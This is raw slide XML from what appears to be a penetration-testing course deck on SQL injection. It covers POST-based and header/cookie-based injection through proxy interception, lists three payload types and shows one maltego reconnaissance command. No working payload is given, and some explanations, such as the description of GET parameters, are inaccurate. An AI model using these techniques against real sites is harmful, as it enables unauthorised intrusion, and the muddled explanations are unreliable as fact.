          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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p198"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5" y="0"/>
            <a:ext cx="5850300" cy="4863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en" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>POST BASED INJECTION</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1337" name="Google Shape;1337;p198"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1925706" y="386006"/>
            <a:ext cx="6876300" cy="3394500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="254000" lvl="0" indent="-247650" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In the GET based injection the parameters taken from the user is passing to HTTP header. As the parameter that passed on the HTTP header file the server process user input that was taken from the HTTP header then the server process request and create the query of the database.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="254000" lvl="0" indent="-247650" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In this case the pen tester can directly inject the malicious code in to the text fields of login form directly to get compromise the constraints.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="254000" lvl="0" indent="-152400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="666666"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" lvl="0" indent="-152400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="666666"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1338" name="Google Shape;1338;p198"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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167</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1339" name="Google Shape;1339;p198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437874" y="2457450"/>
            <a:ext cx="1248600" cy="124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1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1340" name="Google Shape;1340;p198"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016400" y="2857525"/>
            <a:ext cx="4428501" cy="1862650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1341" name="Google Shape;1341;p198"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-2730446">
            <a:off x="-211267" y="2423981"/>
            <a:ext cx="2036516" cy="1238202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1342" name="Google Shape;1342;p198"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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199"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17698" y="625841"/>
            <a:ext cx="6155700" cy="433500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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 sz="1400" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>HEADER AND COOKIE BASED </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1348" name="Google Shape;1348;p199"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79361" y="958594"/>
            <a:ext cx="8316900" cy="2329800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">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Parameter in post method we can’t able to see how the parameters can be taken and so we are using the proxy server like Burp suite or OSWAP. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">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Here we should capture the user request and from before reaching it in to the server the captured request contain the  parameters of input fields are tampered with malicious logic and sending back the request to the server for processing. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">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In the header or cookie based injection the header field of the browser request will be changed and forwarded to the server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1349" name="Google Shape;1349;p199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1169622" y="3099447"/>
            <a:ext cx="5616623" cy="1929332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1350" name="Google Shape;1350;p199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6894258" y="3775657"/>
            <a:ext cx="2249743" cy="1367843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1351" name="Google Shape;1351;p199"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1356" name="Google Shape;1356;p200"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-2996"/>
            <a:ext cx="9144000" cy="5146497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1357" name="Google Shape;1357;p200"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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169</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1358" name="Google Shape;1358;p200"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="33532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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Google Shape;304;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="305" name="Google Shape;305;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="74075" y="1017725"/>
            <a:ext cx="9144000" cy="4130726"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1363" name="Google Shape;1363;p201"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-19322"/>
            <a:ext cx="9144000" cy="5162821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1364" name="Google Shape;1364;p201"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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170</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1365" name="Google Shape;1365;p201"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1370" name="Google Shape;1370;p202"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="9144000" cy="5144108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1371" name="Google Shape;1371;p202"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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171</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1372" name="Google Shape;1372;p202"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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172</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1378" name="Google Shape;1378;p203"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143508" y="1208327"/>
            <a:ext cx="7182900" cy="4086600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="558800" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>The payload that need to injected has to be written clearly according to the logic and scenario of the website by the pen tester, the payload will be different for different websites.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="558800" marR="0" lvl="0" indent="-101600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="558800" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Pen tester need to  clearly code the payload. The payload forming logic is mainly divided </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> types </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" marR="0" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In-band SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" marR="0" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Out of Band  SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" marR="0" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Inferential SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
